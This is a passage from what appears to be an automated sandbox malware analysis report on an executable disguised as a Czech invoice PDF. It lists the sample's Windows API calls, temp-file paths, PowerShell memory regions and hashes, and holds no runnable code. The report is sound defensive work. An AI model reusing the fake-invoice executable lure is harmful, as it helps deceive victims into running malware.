                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          • Opcode ID: 6ba5b411ef68c51829428819e7017d5c81ae953b0e98e705536d86526161d061
                          • Instruction ID: 5dcbc7e61265fa74d5ef9682fa3fdbf8678ca9730cf8e6b661d314f23d035d2c
                          • Opcode Fuzzy Hash: 6ba5b411ef68c51829428819e7017d5c81ae953b0e98e705536d86526161d061
                          • Instruction Fuzzy Hash: 8201F47164020DAFEF149F64DD49FAA3B69BB04304F108039FA05B91D0DBB99955DB58
                          APIs
                            • Part of subcall function 004060C1: lstrcpynW.KERNEL32(?,?,00000400,004033BE,007A7A20,NSIS Error), ref: 004060CE
                            • Part of subcall function 00405B20: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,00405B94,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B2E
                            • Part of subcall function 00405B20: CharNextW.USER32(00000000), ref: 00405B33
                            • Part of subcall function 00405B20: CharNextW.USER32(00000000), ref: 00405B4B
                          • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BD6
                          • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp
                          • API String ID: 3248276644-82684695
                          • Opcode ID: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                          • Instruction ID: abcc44bb5ac455a12af884685492e3fe3933aadea98fff28ba48a73408b515ee
                          • Opcode Fuzzy Hash: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                          • Instruction Fuzzy Hash: 13F0D125110E5126D622373A1C85AAF3964CF8236071A023BF851B22D3DF3CB94289AE
                          APIs
                          • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,00405B94,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B2E
                          • CharNextW.USER32(00000000), ref: 00405B33
                          • CharNextW.USER32(00000000), ref: 00405B4B
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp, xrefs: 00405B21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp
                          • API String ID: 3213498283-3352797860
                          • Opcode ID: d4fc8010274739b422e9c4851511b62dbacfb07d9cf0bff86c6d3941990f78f8
                          • Instruction ID: e578ad655b534d7df776be2fb65b6706c077aea2e5630ee55bcc1a6e0797be72
                          • Opcode Fuzzy Hash: d4fc8010274739b422e9c4851511b62dbacfb07d9cf0bff86c6d3941990f78f8
                          • Instruction Fuzzy Hash: 47F03021900A15A6DA3176584C45E77B7BCEB55760B04807BE611B72C0E7B878818EEA
                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004032FE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405A7B
                          • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004032FE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405A85
                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A97
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A75
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user~1\AppData\Local\Temp\
                          • API String ID: 2659869361-2382934351
                          • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                          • Instruction ID: d45e1729742e3aa2fdad34330c8206e26b696b323e0fb909c728dea942649628
                          • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                          • Instruction Fuzzy Hash: 25D05E61101A34AAC211AB448C04CDF76AC9E46304341402AF601B20A2C7785D5187EE
                          APIs
                          • DestroyWindow.USER32(00000000,00000000,00402FFE,00000001,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00402E31
                          • GetTickCount.KERNEL32 ref: 00402E4F
                          • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402E6C
                          • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: eda6cdc1462fbc7416f633e785c39792dae7d5af29307ff631f073a815034cdd
                          • Instruction ID: ab31da6501661b9f66195f860ccdc22cbbd848d37c78d1f30a2074557711f0e0
                          • Opcode Fuzzy Hash: eda6cdc1462fbc7416f633e785c39792dae7d5af29307ff631f073a815034cdd
                          • Instruction Fuzzy Hash: 5BF0E230866A21ABC2206B24FE8CA9B7B64BB44B02700843BF084F11F4DB7C08D1CBCC
                          APIs
                          • SetWindowTextW.USER32(00000000,007A7A20), ref: 00403C78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$1033
                          • API String ID: 530164218-1537897595
                          • Opcode ID: 25853dc5ba602574d3834410a2da63a6bfdd1c5e7c050dfff0ba9bdbe479cc15
                          • Instruction ID: 76c5e3d7d8337c2df2c2cf7c0ea0ef2dfca4284e7084803d1193080702a4905d
                          • Opcode Fuzzy Hash: 25853dc5ba602574d3834410a2da63a6bfdd1c5e7c050dfff0ba9bdbe479cc15
                          • Instruction Fuzzy Hash: BB11D136B486109BD7249F15DC40A377B6CEBC6716318C13FE802B7391DA3D9A029799
                          APIs
                          • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,0040384D,00403663,?), ref: 0040388F
                          • GlobalFree.KERNEL32(00000000), ref: 00403896
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403875
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user~1\AppData\Local\Temp\
                          • API String ID: 1100898210-2382934351
                          • Opcode ID: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                          • Instruction ID: 4a5153cb0cb6d0fdaec4368861576d16cdbaaa85ae4e97bc048a47c982d0e917
                          • Opcode Fuzzy Hash: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                          • Instruction Fuzzy Hash: BEE012334015305BC622AF54FE4475A77ACAF55B26F15817FF884BB26187B85C434BD8
                          APIs
                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EEE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405AC7
                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EEE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405AD7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-3976562730
                          • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                          • Instruction ID: 0b0a81fb3070cb4cf82837519cbc77f3171bffe5474af214e01851ba7d69d1ae
                          • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                          • Instruction Fuzzy Hash: 69D0A7B3510A30DFC712A704DC80D9F77ACEF5230074A442AE941A7161D7785C818AED
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0B
                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C23
                          • CharNextA.USER32(00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C34
                          • lstrlenA.KERNEL32(00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C3D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                          • Instruction ID: 5c341d1775d35069f70a43f123e54e8e21aae2c79e6e03d0b51ab4281d394374
                          • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                          • Instruction Fuzzy Hash: A4F0C232108A58EFD7029FA5CD00D9FBBA8EF46350B2140B9E841F7310D634DE019FA8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q$4'q
                          • API String ID: 0-3272727544
                          • Opcode ID: 1d75edfe19782a67f6ec470624255143b51bb2209262cdad2d24e73a591b94ba
                          • Instruction ID: f3f12703b1e6f8d3a3b29e4af4803b67c03d13c1d3828883392ad6ee6ea3c66a
                          • Opcode Fuzzy Hash: 1d75edfe19782a67f6ec470624255143b51bb2209262cdad2d24e73a591b94ba
                          • Instruction Fuzzy Hash: 5EF250B4A00319DFEB24DB64C950BEAB7B2BF85304F1085A9D509AB795CB31ED81CF91
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6da1f0f9c5dd77c5e1aa29b6cee32210d55ed9057817f0b008516d574b2edcdc
                          • Instruction ID: 15fc0bfa6fbc916a34cf75e9c789c02f3e69ed22e5cbc3571fe2c2beef3048ee
                          • Opcode Fuzzy Hash: 6da1f0f9c5dd77c5e1aa29b6cee32210d55ed9057817f0b008516d574b2edcdc
                          • Instruction Fuzzy Hash: 71B15271E00209DFEB14CFA9D8857AEBBF2BF48304F148629D615E7254EBB4A851CF85
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b62a72968b19e8c93730df689ff351964df1fe468065f6b21bedf0924ea74f6
                          • Instruction ID: 0209a3b324988e8643bef603974f008d42b0b9b3bc97a467d2495ff5263cf6df
                          • Opcode Fuzzy Hash: 3b62a72968b19e8c93730df689ff351964df1fe468065f6b21bedf0924ea74f6
                          • Instruction Fuzzy Hash: DFB18471E00309DFEB10CFA9D8817DDBBF1AF48318F148A29D614E7254EBB4A895CB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
